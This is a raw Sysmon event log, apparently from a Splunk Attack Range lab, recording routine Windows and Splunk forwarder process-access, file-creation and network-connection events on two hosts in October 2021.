07:48:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103034Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.260{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B1B3-615A-B901-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103033Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.260{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1B3-615A-B901-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103032Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.260{58E9C193-B1B3-615A-B901-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080929Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:04.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E3B5978EA7C5E67EA674038B5B7246B,SHA256=BA36D9B06BE7928B11976AE9913317929459654B63032E394A96DA6BDDE4AB91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103053Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:04.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15B2C1F0D2DC5FF93064201CDFCA7358,SHA256=B0D6C4643890BEAB102B039AD5BF67CBEE08C0223FA80808EE1A52E45D3405C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080928Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:02.792{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49993-false10.0.1.12-8000- 354300x8000000000000000103052Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.306{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49489-false10.0.1.12-8000- 10341000x8000000000000000103051Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:04.166{58E9C193-B1B3-615A-BA01-00000000FC01}61722424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080930Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:05.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C46D6798ECC0C4BA4C1990DCC18326D4,SHA256=91BD4652786391E50C890803AA8D6D9C0B21098825A761E8C058CD8525CC202E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103063Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86EB7362F67385003A82652E2EBE6CEE,SHA256=36DBFD49B52CD42B56FD79101CE383776B66EC2B33FF88AD0A30C1C03D70F85D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103062Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.416{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1B5-615A-BB01-00000000FC01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103061Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.416{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103060Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.416{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103059Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.416{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103058Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.416{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103057Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.416{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B1B5-615A-BB01-00000000FC01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103056Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.416{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1B5-615A-BB01-00000000FC01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103055Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.417{58E9C193-B1B5-615A-BB01-00000000FC01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103054Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:05.010{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5F2874D606DDD3BA95BFC2F105E6630,SHA256=1702679C64D7879B58A588D56C795257C6D729B6102FDFC6CFBDE922894B25B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080931Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:06.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2204569C6157BC61293C9712323398C9,SHA256=F3FAE5DF8E8BFB464990A7F436BF58DBA279F5D9797102697015A4B03882EDE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103065Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:06.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BFB38E5149696D2311110210C16E853,SHA256=775719AEF3F80CD0B99EA21376348B3B7BD19DFA41E052509E19FE72FF210159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103064Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:06.416{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F9FB0FCF0411F2AEA45F6377C4C2126,SHA256=359AB5DA1C2337DB1BDD437F5E7012211B035563AEF73F43580D65567174706A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080932Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:07.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64F2348C918CE18BE55170A9ABCE703,SHA256=A2589BD8DB2699B40D4FE358A86086734A36A6FF346F9202536E5DA284FE8911,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103066Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:07.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80BB83D83C710B6C2AC39E3EE960FEA6,SHA256=613A244162DDBBF24AFAC045E0B7F88C0EA8C69F9BDD5D73E3B8ADDA3ED10B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080933Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:08.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D64C1D6A9F197C5AEF9D2ECF39C7A2C0,SHA256=51F081E6BD92AD89D5B32B6BBB11DEB7C4A3DD974A8815D6EA11A1442E185C71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103068Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:08.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4018D33ABC6B8B3EE074595DE731FF54,SHA256=80514004B43B1A79EE94743678BD1B25ADEB35A3C3F842430EA893F4C8A93344,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103067Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:07.431{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49490-false10.0.1.12-8000- 23542300x800000000000000080935Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:09.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E773C1BFD7A7DF401E5E3BB90E1FA8,SHA256=C5511F932A5EA9698F1C24FDB03CA2D5544545835CBD0F2B4281CF2F509224DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103069Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:09.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEB1454E19FAC2F3C9AF4093C4B23389,SHA256=A68D7F974A5D1B38BD8EAD16C70E20CAEFF3B2BE5D46BA40DFD893A9497764BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080934Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:07.808{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49994-false10.0.1.12-8000- 23542300x800000000000000080936Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:10.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C602368C65FB5EEE9AF41FB5B11262B,SHA256=D1DDD053BB009967A2F139ED7C4799648BBFBD64D801860501B2D4B02D74B13A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103070Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:10.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B6683E9B0C345FD29B2782BC2B87F87,SHA256=6F1215DEA41C53F1EF13E429FD68A9F1171F4135D1A9FC2E65BC899E43803159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080937Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:11.896{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C68D78E1CE7EB341673E1C633E4ED86B,SHA256=D7FBE4DFBF53D9C2165A084637655B9C68224721DF200C98FA8AB7BC2049FE26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103071Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:11.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=088A2F487A0DEC9BB96BC39A4CE5AA4F,SHA256=6B940BAD0060F539E86B707DAC8FF95740E5FFAD475E4F95782982B0336D6D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080938Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:12.896{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E767915FBFF96B1C0AED995E6CD4812D,SHA256=6FE131A2074BC102014374E75CAD3C8747667B355B1A5BC504F4BECEA85043DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103072Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:12.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6309EDF4A4868DE3DA2A845B172962BA,SHA256=D1B6201CF0B5245010BC6C04CCAB360B521E9FAAE77899CDD1C834262FEB8462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080939Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:13.896{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF227787DB7E7756B2A315747084F02A,SHA256=4363354B3690677F2BEEB752661EE6D39591DBF422529160369CDFE47AD199E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103104Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103103Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103102Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 